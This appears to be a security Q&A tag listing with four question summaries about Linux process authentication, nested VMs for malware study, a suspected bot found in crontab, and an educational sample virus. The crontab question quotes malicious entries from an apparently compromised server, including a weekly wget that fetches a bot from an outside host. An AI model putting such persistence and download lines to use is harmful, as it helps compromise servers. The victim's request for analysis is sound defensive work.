Tagged Questions
6
votes
2answers
113 views
Process authentication for Linux
Is there any possibility to authenticate a running process in Linux to be sure that this is the original/right one?
I know that an Linux operating system is only that secure like the way you use it. ...
5
votes
4answers
344 views
Would running VMs inside of VMs be a more secure way to study viruses, etc?
I was reading this post on SuperUser, and it made me wonder about security. I've read somewhere else that some viruses/malware/whatever CAN break outside of a VM... and then infect the host OS. BUT, ...
3
votes
2answers
579 views
Is SecureShellz bot a virus? How does it work?
I'm using a development server in which I found this in the crontab:
[...]
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O ...
2
votes
3answers
720 views
Writing a sample virus (not harmful)
I don't know if such a question is allowed on this site, sorry if it's not
For educational purposes I am asked to write a small virus running on Linux, which should just be able to inject itself into ...